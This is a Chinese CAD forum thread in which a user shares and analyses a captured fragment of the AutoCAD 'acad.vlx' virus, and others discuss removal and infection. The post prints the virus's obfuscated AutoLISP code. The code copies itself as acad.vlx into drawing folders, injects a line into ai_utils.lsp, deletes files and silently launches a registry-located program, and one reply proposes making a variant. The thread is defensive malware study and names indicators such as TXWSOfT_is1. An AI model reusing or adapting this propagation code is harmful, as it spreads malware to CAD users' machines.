[风之影][源码]acad.vlx病毒感染的片段

cabinsummer

截获一个病毒片段，该病毒自动在保存时生成acad.vlx。
在acad.mnl有如下内容

1. (vl-file-copy (findfile (strcat (chr 108)(chr 111)(chr 103)(chr 111)(chr 46)(chr 103)(chr 105)(chr 102)))(strcat (getvar "dwgprefix")(chr 97)(chr 99)(chr 97)(chr 100)(chr 46)(chr 118)(chr 108)(chr 120)))
   
2. ;;;(vl-file-copy (findfile "logo.gif")(strcat (getvar "dwgprefix") "acad.vlx"))
   
3. (load "acadapp");;;加载acadapp
   
4. (princ)
   
5. (load "acadfile");;;加载acadfile
   
6. (princ)
   
7. (vl-file-delete
   
8.   (findfile
   
9.     (strcat
   
10.       (vl-registry-read
    
11.         (strcat
    
12.           "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
    
13.           (chr 84)
    
14.           (chr 88)
    
15.           (chr 87)
    
16.           (chr 83)
    
17.           (chr 79)
    
18.           (chr 102)
    
19.           (chr 84)
    
20.           (chr 95)
    
21.           (chr 105)
    
22.           (chr 115)
    
23.           (chr 49)         
    
24.         )
    
25.         "InstallLocation"
    
26.       )
    
27.       "support\\"
    
28.       (chr 77)
    
29.       (chr 65)
    
30.       (chr 73)
    
31.       (chr 78)
    
32.       (chr 46)
    
33.       (chr 102)
    
34.       (chr 97)
    
35.       (chr 115)
    
36.     )
    
37.   )
    
38. )
    
39. ;;;(vl-file-delete (findfile (strcat (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "InstallLocation") "support\\" "main.fas")))
    
40. 
    
41. (startapp
    
42.   (vl-registry-read
    
43.     (strcat
    
44.       "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
    
45.       (chr 84)
    
46.       (chr 88)
    
47.       (chr 87)
    
48.       (chr 83)
    
49.       (chr 79)
    
50.       (chr 102)
    
51.       (chr 84)
    
52.       (chr 95)
    
53.       (chr 105)
    
54.       (chr 115)
    
55.       (chr 49)         
    
56.     )
    
57.     "QuietUninstallString"
    
58.   )
    
59. )
    
60. ;;;(startapp (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "QuietUninstallString"))
    
61. 
    
62. (vl-file-delete
    
63.   (findfile
    
64.     (strcat
    
65.       (vl-registry-read
    
66.         (strcat
    
67.           "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
    
68.           (chr 84)
    
69.           (chr 88)
    
70.           (chr 87)
    
71.           (chr 83)
    
72.           (chr 79)
    
73.           (chr 102)
    
74.           (chr 84)
    
75.           (chr 95)
    
76.           (chr 105)
    
77.           (chr 115)
    
78.           (chr 49)         
    
79.         )
    
80.         "InstallLocation"
    
81.       )
    
82.       "support\\"
    
83.       (chr 77)
    
84.       (chr 65)
    
85.       (chr 73)
    
86.       (chr 78)
    
87.       (chr 46)
    
88.       (chr 102)
    
89.       (chr 97)
    
90.       (chr 115)
    
91.     )
    
92.   )
    
93. )
    
94. ;;;(vl-file-delete (findfile (strcat (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "InstallLocation") "support\\MAIN.fas")))
    
95. 
    
96. (startapp
    
97.   (vl-registry-read
    
98.     (strcat
    
99.       "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
    
100.       (chr 84)
     
101.       (chr 88)
     
102.       (chr 87)
     
103.       (chr 83)
     
104.       (chr 79)
     
105.       (chr 102)
     
106.       (chr 84)
     
107.       (chr 95)
     
108.       (chr 105)
     
109.       (chr 115)
     
110.       (chr 49)         
     
111.     )
     
112.     "QuietUninstallString"
     
113.   )
     
114. )
     
115. ;;;(startapp (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "QuietUninstallString"))
     
116. 
     
117. (load "acadapp")
     
118. (princ)

(vl-file-copy (findfile (strcat (chr 108)(chr 111)(chr 103)(chr 111)(chr 46)(chr 103)(chr 105)(chr 102)))(strcat (getvar "dwgprefix")(chr 97)(chr 99)(chr 97)(chr 100)(chr 46)(chr 118)(chr 108)(chr 120)))<br /> ;;;(vl-file-copy (findfile "logo.gif")(strcat (getvar "dwgprefix") "acad.vlx"))<br /> (load "acadapp");;;加载acadapp<br /> (princ)<br /> (load "acadfile");;;加载acadfile<br /> (princ)<br /> (vl-file-delete<br />   (findfile<br />     (strcat<br />       (vl-registry-read<br />         (strcat<br />           "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"<br />           (chr 84)<br />           (chr 88)<br />           (chr 87)<br />           (chr 83)<br />           (chr 79)<br />           (chr 102)<br />           (chr 84)<br />           (chr 95)<br />           (chr 105)<br />           (chr 115)<br />           (chr 49)          <br />         )<br />         "InstallLocation"<br />       )<br />       "support\\"<br />       (chr 77)<br />       (chr 65)<br />       (chr 73)<br />       (chr 78)<br />       (chr 46)<br />       (chr 102)<br />       (chr 97)<br />       (chr 115)<br />     )<br />   )<br /> )<br /> ;;;(vl-file-delete (findfile (strcat (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "InstallLocation") "support\\" "main.fas")))<br /> <br /> (startapp<br />   (vl-registry-read<br />     (strcat<br />       "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"<br />       (chr 84)<br />       (chr 88)<br />       (chr 87)<br />       (chr 83)<br />       (chr 79)<br />       (chr 102)<br />       (chr 84)<br />       (chr 95)<br />       (chr 105)<br />       (chr 115)<br />       (chr 49)          <br />     )<br />     "QuietUninstallString"<br />   )<br /> )<br /> ;;;(startapp (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "QuietUninstallString"))<br /> <br /> (vl-file-delete<br />   (findfile<br />     (strcat<br />       (vl-registry-read<br />         (strcat<br />           "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"<br />           (chr 84)<br />           (chr 88)<br />           (chr 87)<br />           (chr 83)<br />           (chr 79)<br />           (chr 102)<br />           (chr 84)<br />           (chr 95)<br />           (chr 105)<br />           (chr 115)<br />           (chr 49)          <br />         )<br />         "InstallLocation"<br />       )<br />       "support\\"<br />       (chr 77)<br />       (chr 65)<br />       (chr 73)<br />       (chr 78)<br />       (chr 46)<br />       (chr 102)<br />       (chr 97)<br />       (chr 115)<br />     )<br />   )<br /> )<br /> ;;;(vl-file-delete (findfile (strcat (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "InstallLocation") "support\\MAIN.fas")))<br /> <br /> (startapp<br />   (vl-registry-read<br />     (strcat<br />       "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"<br />       (chr 84)<br />       (chr 88)<br />       (chr 87)<br />       (chr 83)<br />       (chr 79)<br />       (chr 102)<br />       (chr 84)<br />       (chr 95)<br />       (chr 105)<br />       (chr 115)<br />       (chr 49)          <br />     )<br />     "QuietUninstallString"<br />   )<br /> )<br /> ;;;(startapp (vl-registry-read "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TXWSOfT_is1" "QuietUninstallString"))<br /> <br /> (load "acadapp")<br /> (princ)

该病毒同时感染多个mnl文件，修改ai_utils.lsp文件，在其中添加

1. (vl-file-copy (findfile (strcat (chr 108)(chr 111)(chr 103)(chr 111)(chr 46)(chr 103)(chr 105)(chr 102)))(strcat (getvar "dwgprefix")(chr 97)(chr 99)(chr 97)(chr 100)(chr 46)(chr 118)(chr 108)(chr 120)))

(vl-file-copy (findfile (strcat (chr 108)(chr 111)(chr 103)(chr 111)(chr 46)(chr 103)(chr 105)(chr 102)))(strcat (getvar "dwgprefix")(chr 97)(chr 99)(chr 97)(chr 100)(chr 46)(chr 118)(chr 108)(chr 120)))

可以肯定的是acad.vlx、logo.gif、main.fas、acadapp(扩展名可能是lsp或fas或vlx)、acadfile(扩展名可能是lsp或fas或vlx)都是病毒文件。从病毒片段来看，该病毒调用了注册表中指向路径的某个程序，在启动后又删除了它。请注意TXWSOfT_is1这个特征字。病毒肯定在其它地方有备份。这个备份的复制也许不是lisp做的，而是调用注册表指向路径的程序做的。由于忽略了这一点，笔者在删病毒时没有先将以上片段注释掉，导致病毒样本不完全。因为注释掉之后，那些删除病毒备份的语句不起作用，病毒就会露马脚。希望中acad.vlx病毒的大侠们继续，期待中……

cabinsummer

原来没有一个大侠对此感兴趣

zoubo604

你是希望大侠们多做病毒啊?

cabinsummer

zoubo604 发表于 2011-9-26 23:16
你是希望大侠们多做病毒啊?

我是反病毒的。开源只是让大家更加了解病毒。其实，编写病毒的人肯定要了解软件启动过程。就像DOS时代，很多人都能制作病毒，因为DOS操作系统被很多人研究透。而WINDOWS的病毒就不如DOS那么多，因为理解WINDOWS底层的人没有DOS那么多。AutoCAD就象一个操作系统，理解它本身，就会让CAD病毒无处藏身。我昨天就是因为杀毒过快，没有取得完整的病毒样本，所以帖子没写好。但是我给出了分析方法，所以希望反病毒的大侠们继续。也提醒制造病毒的大侠们，你们的痕迹已被我捕捉到了，下次隐藏自己的行踪应该更高级些才有挑战性。

xshrimp

以前也研究了一下cad病毒
下面是我写的专杀工具.99%现在的cad病毒都能查杀。

logoin

中了这个病毒会怎么样....

cabinsummer

xshrimp 发表于 2011-9-27 10:32
以前也研究了一下cad病毒
下面是我写的专杀工具.99%现在的cad病毒都能查杀。

我公布病毒源码，是让有兴趣的人研究，如果仅仅是杀毒，你应该另立帖子。

cnks

改改，弄个变种出来

xiaotao

每一个文件都会生成一个acad.vlx,如何解决这个问题？

kkk3kkk

有没有给程序重创的部分..........片段